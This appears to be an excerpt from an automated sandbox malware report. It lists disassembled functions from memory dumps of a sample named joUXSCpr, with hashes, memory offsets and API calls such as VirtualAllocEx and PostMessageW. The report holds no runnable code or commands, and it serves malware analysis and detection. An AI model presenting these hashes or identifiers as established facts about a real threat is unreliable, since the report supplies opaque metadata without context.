                          • Instruction ID: 08b4131fe4728cb9ca72a78dac2b03d9ecd35a294b3756eb096203db3085710d
                          • Opcode Fuzzy Hash: f94326df43d253b68a54bf8b59be278c2debcdf4d6054f2cd0e31a828c2a1d49
                          • Instruction Fuzzy Hash: FB1110B6C006498FDB10CF9AC444BDEFBF5EF88218F10846AD429A7600C379A545CFA1
                          Function 04CB45F8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04CB648D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: e8305381c6d804710fe34f989e01858d2e2da2f347e2aaee2f883597d0809d09
                          • Instruction ID: 9d9f526ce6fe8bc893c34173a17d48fd82a2105ec55e10776b159edf9d4ee8ad
                          • Opcode Fuzzy Hash: e8305381c6d804710fe34f989e01858d2e2da2f347e2aaee2f883597d0809d09
                          • Instruction Fuzzy Hash: 971103B59007499FDB10DF9AD485BEEBBF8EB48320F10841AE558A7740D375A944CFA1
                          Function 04CB6428 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04CB648D
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: c7b75e974ed4e40d44987103456e2ea1f705c9035407beb588d49c1107aec3bd
                          • Instruction ID: 9780572c6b98238481f256c707179403486be6e0bbf1f3c5b60badc728afd37c
                          • Opcode Fuzzy Hash: c7b75e974ed4e40d44987103456e2ea1f705c9035407beb588d49c1107aec3bd
                          • Instruction Fuzzy Hash: 471115B9800349CFDB10CF99D585BDEBBF4FB48310F20841AD558A3640C378A544CFA1
                          Function 04CB2A60 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04CB2ACE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1498430698.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4cb0000_joUXSCpr.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b5c02a414c1e6f9a6a31fc1e85ae2b163a16cbc0be26f2adfe8408617c9dbbb1
                          • Instruction ID: 39a99990afd4e788f5dd662366b451978ba077e15e9a3bca528687ed5ab72a17
                          • Opcode Fuzzy Hash: b5c02a414c1e6f9a6a31fc1e85ae2b163a16cbc0be26f2adfe8408617c9dbbb1
                          • Instruction Fuzzy Hash: 570135718003499FDB10DFAAC849BEFBFF9EF08314F148419E519A7250C779A540CBA1
                          Function 0539F0E6 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: fc9b1cb9b518a446c90d3c83c531d03282a77114175ce3d447b04ad62d5b584c
                          • Instruction ID: 81f9938527fd56c3a4e47dde8ac1c1cfd2de1e62eadc1894aba1f79640159d5e
                          • Opcode Fuzzy Hash: fc9b1cb9b518a446c90d3c83c531d03282a77114175ce3d447b04ad62d5b584c
                          • Instruction Fuzzy Hash: 441191F4A0424ACFEF05DFA4D880AECBBBAFB49310F14A215E41ADB349DB709C058B10
                          Function 0539F09A Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 15e2c63e9af43f399b0818a168fbfc7c85bd3506b524ca80e9af8041b04b2c80
                          • Instruction ID: 983c6d732d971e27c65b2fb4dfd70f1bfd94e37996e11e7d6d9dfb3356992d90
                          • Opcode Fuzzy Hash: 15e2c63e9af43f399b0818a168fbfc7c85bd3506b524ca80e9af8041b04b2c80
                          • Instruction Fuzzy Hash: A401FFB4A1424ECFEB15DFE4D84469CBBBAFB49310F10A215E51AEF748DB70AC058B50
                          Function 0539F05C Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: e1248205332be7e28f17d725719638331219847308e81862a8eeaddb5b31643f
                          • Instruction ID: ea9e79ec4ea78377d31596269da434f9df36d86248cde2cf42ca393a88af6a01
                          • Opcode Fuzzy Hash: e1248205332be7e28f17d725719638331219847308e81862a8eeaddb5b31643f
                          • Instruction Fuzzy Hash: B4F019B4A1434A8FEB05DFA4D894A9CBBBAEB49310F109215E91ADF789DA705C05CB40
                          Function 05396220 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: d193e4f8929dff1f932c983b1571eccaa0149188ab0a649cb99f4419ece863a8
                          • Instruction ID: 369b053452a6fcd6af048c611ee76babe13f6b02bef8acbdd67c7fddaa4616d8
                          • Opcode Fuzzy Hash: d193e4f8929dff1f932c983b1571eccaa0149188ab0a649cb99f4419ece863a8
                          • Instruction Fuzzy Hash: 8BE0C27028C259ABDF292BA0E823B727B3EE782701F48802AF28186180CE638410C734
                          Function 05396230 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: 63f9a9556d2637fd547124829a34a954155accfe04f5dd29990fa3a8554a24f3
                          • Instruction ID: 3848942f180eb7573cab9722aab554d2cf9f19c37ac0f804b769dbb3fcb1b7e8
                          • Opcode Fuzzy Hash: 63f9a9556d2637fd547124829a34a954155accfe04f5dd29990fa3a8554a24f3
                          • Instruction Fuzzy Hash: 0FD05B7034931CEFDF6856D1E417B36766EB785701F14801EF54695584DEB28800C735
                          Function 05396BA2 Relevance: .2, Instructions: 194COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 05156fc7eaaa9244b7e67e9fcc144c14d72d2dedbcfa184cf4b06bb4bcae9c7c
                          • Instruction ID: 4ca8ac44a236701e1d178ca0ebdd3d1688fb5bb7c5575a6b958399f9587691e8
                          • Opcode Fuzzy Hash: 05156fc7eaaa9244b7e67e9fcc144c14d72d2dedbcfa184cf4b06bb4bcae9c7c
                          • Instruction Fuzzy Hash: C0715BB5E09218DFEF18CB95D586BADBBB7FF80301F14812AE412AB695CB709C41CB51
                          Function 05395970 Relevance: .2, Instructions: 167COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4548723004dc605aaf1e160bcc8db1b932cbde09ba376af11270e0f16b1a4395
                          • Instruction ID: 95ff69d2c30d17175f1a772ed229d8ced520ed5a1cefbf8a5bb7a199b5dd5692
                          • Opcode Fuzzy Hash: 4548723004dc605aaf1e160bcc8db1b932cbde09ba376af11270e0f16b1a4395
                          • Instruction Fuzzy Hash: 14516C707002018FDB1AEF69C594B6AB7EAAF89314F144169E40ADB3A1DFB5EC41CB91
                          Function 053915C0 Relevance: .2, Instructions: 153COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87ce28b6724bc220e203832e55c6b83d01b8bca2fbdcf0c278d4622d5178e9a2
                          • Instruction ID: f41767bff76a5b95e3fa02a4d31fc903277871859ada0dc3957f7caa5830c9eb
                          • Opcode Fuzzy Hash: 87ce28b6724bc220e203832e55c6b83d01b8bca2fbdcf0c278d4622d5178e9a2
                          • Instruction Fuzzy Hash: 72519F71B002099FDF08EFB488107AE7BB6BF89200F248569E445EB385DE39DD41CB95
                          Function 0539595F Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ed321917e57c6b0cc0cbbcc5633a3815988f9f182588446b956479f6c53e2c4
                          • Instruction ID: 27ec12ccc9cdda90d49748f6446de4e784b63dd3d02a00990351d29f7e7bafcb
                          • Opcode Fuzzy Hash: 4ed321917e57c6b0cc0cbbcc5633a3815988f9f182588446b956479f6c53e2c4
                          • Instruction Fuzzy Hash: EE417C707002059FDB1AEF68C584BAAB7FAAF89304F144469E40ADB351DBB5EC41CBA1
                          Function 053904D0 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eaa65ed976ffcd26922fa4abfb2e7fac7f0b4ccb21bddb1a46f5466dddb2e2b8
                          • Instruction ID: a25c38bbeb41aa66c5a854e64fabddc4c179b38c36e8b4050800d72cc9bf9655
                          • Opcode Fuzzy Hash: eaa65ed976ffcd26922fa4abfb2e7fac7f0b4ccb21bddb1a46f5466dddb2e2b8
                          • Instruction Fuzzy Hash: C141DE71704610DFDB2C9A29D948BBAB7E6FB85310F04856EE40A9B241CBB5E846CB91
                          Function 053982E8 Relevance: .1, Instructions: 96COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c9c83164ca78e571a91c4d548fead5ffeb214ce7e295e93575ab58f014e43e3
                          • Instruction ID: a7cbd56df9a0ca80565535f11cf705a6789feb04b41c14791f25f23ecf476d37
                          • Opcode Fuzzy Hash: 1c9c83164ca78e571a91c4d548fead5ffeb214ce7e295e93575ab58f014e43e3
                          • Instruction Fuzzy Hash: 2A31ACB4A14255CFCB08CFA9C9806AEFBBAFF86310F94822AE416D7645C375D9418B91
                          Function 053982F8 Relevance: .1, Instructions: 95COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 08cc2bfe657c97cdf219b9ff99e4e674e98b894e0599d1227b6e1ce21a699c84
                          • Instruction ID: 6e5684d7df76b8b4c6d0b456420298d8d1b045d4a59d4792afc32f85b087b65e
                          • Opcode Fuzzy Hash: 08cc2bfe657c97cdf219b9ff99e4e674e98b894e0599d1227b6e1ce21a699c84
                          • Instruction Fuzzy Hash: 67319EB4A14255CFDF08CFA9C9806AFF7BAFF86310F44422AE456D7685C374D9418B91
                          Function 053940E8 Relevance: .1, Instructions: 86COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7aed2b9a94adbc578977936e697992cd8e3acbb75a415c05875f17082d881fc2
                          • Instruction ID: b43131b60aac2fb75326733d3228e133b51e69c16199ddb54a54251d90abcc53
                          • Opcode Fuzzy Hash: 7aed2b9a94adbc578977936e697992cd8e3acbb75a415c05875f17082d881fc2
                          • Instruction Fuzzy Hash: AD21AF757142108FCF18EB69E414A6E73EABF8966171540AAE906CB361EE71DC02CBA0
                          Function 0539A1BA Relevance: .1, Instructions: 85COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5bdadc6dc6b6f02e9a4c8c87043469fccdd182e1e2f5986e6135a9b452df8cf6
                          • Instruction ID: 61ce3d4a0a82d4a217f52130aed2f9fea9def786eb79d1ed8e2511f8e4e08718
                          • Opcode Fuzzy Hash: 5bdadc6dc6b6f02e9a4c8c87043469fccdd182e1e2f5986e6135a9b452df8cf6
                          • Instruction Fuzzy Hash: 7031D8B4E142099FCB44CFA9C581AAEFBF2FF88300F10956AD419A7714D7759A41CF51
                          Function 0539A1C8 Relevance: .1, Instructions: 82COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b2eecd6e5c1c3e34c5cf0f048a025ac733ada2174e4bd7381093e16f8de90eb
                          • Instruction ID: 3f4113a252b7b288195e121f28dd8c69cd2ffd35dadd18428a89b36f0d4b488e
                          • Opcode Fuzzy Hash: 2b2eecd6e5c1c3e34c5cf0f048a025ac733ada2174e4bd7381093e16f8de90eb
                          • Instruction Fuzzy Hash: 8031E4B4E042099FCB48CFA9C5819AEFBF6FF88300F10956AD819A7715E7759A41CF90
                          Function 0539A2F2 Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20bc027fa7c7dff55428e5eca947bbebdc3091b8925397cf90c3f7a4d7edc5bc
                          • Instruction ID: dbb80443e87138d1c1b79470ff087b9c938b5fad53184bbf2478296be7445b4b
                          • Opcode Fuzzy Hash: 20bc027fa7c7dff55428e5eca947bbebdc3091b8925397cf90c3f7a4d7edc5bc
                          • Instruction Fuzzy Hash: 0131F6B1E04219DFDB48CFA9C581AAEFBF6BF88300F10CAA99415A7714D7749A018F91
                          Function 013CD01C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 35eabf2a0ccbea9420adf7033e14200987d2ab0f1736f958b26ddf7a7c93b161
                          • Instruction ID: 93a48dd2823e1579f9403c4bf5bd313c2f6ce64c4b828e45ae200ca7c5a22588
                          • Opcode Fuzzy Hash: 35eabf2a0ccbea9420adf7033e14200987d2ab0f1736f958b26ddf7a7c93b161
                          • Instruction Fuzzy Hash: 59210071604344DFDB15DF58D8C0B26BBA5FB84618F24C5BDE80A4B686C336D807CBA2
                          Function 013CD1D4 Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 112c7480eabf5cc99f6a8dcfbcfec4a7115e71ab9f5aeb8bd8e191412dfa60d5
                          • Instruction ID: 6193992c390be0f3a09993da698cdd767ab6a10fb7df94e221859fb4c90a7c54
                          • Opcode Fuzzy Hash: 112c7480eabf5cc99f6a8dcfbcfec4a7115e71ab9f5aeb8bd8e191412dfa60d5
                          • Instruction Fuzzy Hash: C2210471504344EFDB05DF94D9C0B26BBA6FB84728F24C5BDE8094B692C336D846CBA1
                          Function 0539EFB2 Relevance: .1, Instructions: 68COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65167f9af70c127cbaa2e36f4fc9bd24819176ebf5896f65c56862c21a496b2c
                          • Instruction ID: 7cc142551b5ae78b258efd33e194f9a29b3e792f371681e06f5371c8335b257d
                          • Opcode Fuzzy Hash: 65167f9af70c127cbaa2e36f4fc9bd24819176ebf5896f65c56862c21a496b2c
                          • Instruction Fuzzy Hash: EB3148B4A00208CFEB29DF64E684AACBBF9FB09301F4491A6E54ADB315CB709C40CF50
                          Function 0539F1B8 Relevance: .1, Instructions: 67COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e6ce460582e5dc00e23894c9a51df82ca49548c4dae8220b516fbddd1233984
                          • Instruction ID: d6f2554280ab0c0e3d35aeb8c7e2c72c8e11584f6cef50ce29e728b381240cf9
                          • Opcode Fuzzy Hash: 6e6ce460582e5dc00e23894c9a51df82ca49548c4dae8220b516fbddd1233984
                          • Instruction Fuzzy Hash: 9E314AB4A10208CFEB28DF64E585A98BBF9FB49301F4491AAE549DB351DF709C40CF50
                          Function 013CD006 Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c059124bae10812ac7266a104e10ca5ef8add0f77e66de06591d2afd3cc0bce1
                          • Instruction ID: d776a6beac52855c777d42b879757e00a4775479477925c89d799de57bc54a7a
                          • Opcode Fuzzy Hash: c059124bae10812ac7266a104e10ca5ef8add0f77e66de06591d2afd3cc0bce1
                          • Instruction Fuzzy Hash: 3B2192755083809FCB03CF58D994711BF71EB46218F28C5EAD8498F2A7C33A9846CBA2
                          Function 0539EFCE Relevance: .1, Instructions: 63COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db710a5c250a8b7be4c3b4b707987085429a760421b9b3e8b206388fd7e0a7b5
                          • Instruction ID: cd80292b5542afc9fee3f9e1180b2312905f969850ced5569efc9e2604c75993
                          • Opcode Fuzzy Hash: db710a5c250a8b7be4c3b4b707987085429a760421b9b3e8b206388fd7e0a7b5
                          • Instruction Fuzzy Hash: DE2147B4904249CFEB09DFA8D585AACBBFDFB0A305B555126E40ADB296DB709C00CF21
                          Function 05392408 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d5d6e1bcf3f7a9e6fc9f5b8a31f2a6271460f5f0e5a8ed08369b586b350b1e1
                          • Instruction ID: 71cc010c7121eae0d125e181dfd211bbe18778376b560c0e2fbf0ad32a9692cf
                          • Opcode Fuzzy Hash: 0d5d6e1bcf3f7a9e6fc9f5b8a31f2a6271460f5f0e5a8ed08369b586b350b1e1
                          • Instruction Fuzzy Hash: A811E334704208EFD705EBB4D81576E7BB6FF85200F208299E0499B2D1CB359D47C751
                          Function 013CD1CF Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1491312976.00000000013CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013CD000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_13cd000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction ID: ee827e43ceb53bb14a32e25380961c8ffa541b91ca67f7e5ccfb3faa09fa6d03
                          • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction Fuzzy Hash: 8D11BE76504240DFCB02CF54C5C0B15BB72FB84628F24C6AEE8494B696C33AD84ACB91
                          Function 053923CF Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2057e13da2cef377edc3c2c4133ec8f6d8d723a87fb1d7842379a61c209c67dd
                          • Instruction ID: 8d805678d54468ace1a8bc011fd5e2dd77a10fbba49e48e873a28aa8d1a43240
                          • Opcode Fuzzy Hash: 2057e13da2cef377edc3c2c4133ec8f6d8d723a87fb1d7842379a61c209c67dd
                          • Instruction Fuzzy Hash: 5D11ED35704204DFDB09DB74C894BAABFB2BF89200F5486AAE049CB2A1CB36CC42C701
                          Function 05394CF2 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 353aa4880f649850f902979c6ad02caa03a70c5291a80a4d89ecb104ca48bb74
                          • Instruction ID: c4a5b92d107d7b9abc90a16e1724713cb77a2c36debff710ae292d68a42cf5d1
                          • Opcode Fuzzy Hash: 353aa4880f649850f902979c6ad02caa03a70c5291a80a4d89ecb104ca48bb74
                          • Instruction Fuzzy Hash: 4F0169B09042899FDB05EBB9E89A79CBFB0AF45301F1046A9E415F7292EE745E04CB51
                          Function 05398B99 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b10b0aadeccea66de5ac336464af36dab274efa478b7d4a15a4924a0466098d5
                          • Instruction ID: 932514dd2117a7c2bf9d4bc9eeb271a0d4e1398cbce694954009b3b29eeec03a
                          • Opcode Fuzzy Hash: b10b0aadeccea66de5ac336464af36dab274efa478b7d4a15a4924a0466098d5
                          • Instruction Fuzzy Hash: 840196B0925204EFDB08DFB4D54A65EFFF6FF8A341F14C8659405E3255EB358A428644
                          Function 053924C2 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a1555dc3c56420fc1c8bc7e1265dc79e7c754ab25c6517896e7cebac32ec16a
                          • Instruction ID: 2fd410ee5f1611755481ea4ff758bf32646862936b836e5b884fc6cacd23d68f
                          • Opcode Fuzzy Hash: 4a1555dc3c56420fc1c8bc7e1265dc79e7c754ab25c6517896e7cebac32ec16a
                          • Instruction Fuzzy Hash: 48018434304A00DFDB19EB64D450E26B3A6BF85322F55C569E4098B691CBB1DC02CB41
                          Function 053904C1 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6db078c0371bb7e574ac69d26bc9076ef2cf17d22604d29581d9671d51161c49
                          • Instruction ID: d73d49e2a52c364c4f6a918784b55d480c78f87da3d7f8b5b999c5eb93388bed
                          • Opcode Fuzzy Hash: 6db078c0371bb7e574ac69d26bc9076ef2cf17d22604d29581d9671d51161c49
                          • Instruction Fuzzy Hash: F8F022B3609121DBC33CAA29E9496FBBED4EB44B10F08426AE10ADB251C7259801CBE1
                          Function 05398BA8 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.1499833846.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_5390000_joUXSCpr.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cd436c501d8158005b1238d10c01614fc444bedf1ac7331925de09cf88d8bc9
                          • Instruction ID: e2c0029099c19bbb0b1b35b8987a74a745692f4fbf154c98cece3cb496e0fd89
                          • Opcode Fuzzy Hash: 4cd436c501d8158005b1238d10c01614fc444bedf1ac7331925de09cf88d8bc9
